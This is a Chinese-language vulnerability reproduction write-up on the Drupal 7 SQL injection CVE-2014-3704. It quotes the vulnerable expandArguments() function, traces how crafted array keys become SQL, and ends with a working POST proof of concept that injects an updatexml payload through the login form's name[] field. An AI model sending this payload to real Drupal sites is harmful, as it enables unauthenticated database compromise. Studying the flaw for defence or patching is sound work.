Drupal SQL 注入(CVE-2014-3704)

前言

参考披露的报告复现

  • 影响版本: Drupal 7.0 ~ 7.31

  • 漏洞类型: SQL Injection (无需认证)

  • 漏洞文件: includes/database/database.inc

  • 漏洞函数: DatabaseConnection::expandArguments()

漏洞复现

漏洞代码

文件路径: includes/database/database.inc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
protected function expandArguments(array $args) {
    $modified = FALSE;  // 标记是否有修改

    // 遍历所有参数
    foreach ($args as $key => $value) {
        // 如果值是数组,需要展开
        if (is_array($value)) {
            $modified = TRUE;
            $new_keys = array();

            // ★ 漏洞核心:使用子数组的原始键名 $i 直接拼接到新键名中
            foreach ($value as $i => $val) {
                // $i 是用户可控的(例如 $_POST 的键名),未经过滤!
                $new_keys[$key . '_' . $i] = $val;
            }

            // 移除原数组键,合并展开后的键值对
            unset($args[$key]);
            $args = array_merge($args, $new_keys);
        }
    }

    return $args;
}

构造一个恶意输入

1
2
3
4
5
6
7
$malicious = [
    'user' => ['name' => 'Alice', 'age' => 25],
    'options' => [
        'debug' => true,
        "1' OR '1'='1" => 'inject'   // 恶意键名
    ]
];

打断点调试(这里采用的是模拟的过程)

可以看到当前参数 $args 的值是 useroptions 两个数组

进入第一个 foreach 循环中,$key 是第一个数组 user$value 是其值

因为 $value 是数组,所以命中了 if

继续往后面走,$i 是数组 $value 键名,$val 是其值

更新 $new_keysuser_name = "Alice"

往后走,此时 $new_keys 的值更新完毕

新数组与第二个数组合并

接下来处理第二个数组,方法一样

新的第二个数组出来了

最后 return 返回的值,可以看到我们的键名是一个万能密码

最后生成的数组如下

利用链

1
2
3
4
5
6
user_login_submit()
  → user_authenticate($name, $password)
    → user_load_by_name($name)
      → db_query("SELECT * FROM {users} WHERE name = :name", array(':name' => $name))
        → DatabaseConnection::query($query, $args)
          → $this->expandArguments($args)    ◄── 漏洞触发点

传入 expandArguments()$args 参数为:

1
2
3
4
5
6
$args = array(
    ':name' => array(
        '0 or updatexml(0,concat(0xa,user()),0)#' => 'bob',
        0 => 'a'
    )
);

最后展开的结果

1
2
3
4
array(
    ':name_0 or updatexml(0,concat(0xa,user()),0)#' => 'bob',
    ':name_0' => 'a'
)

POC

1
2
3
4
5
6
7
8
9
10
11
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a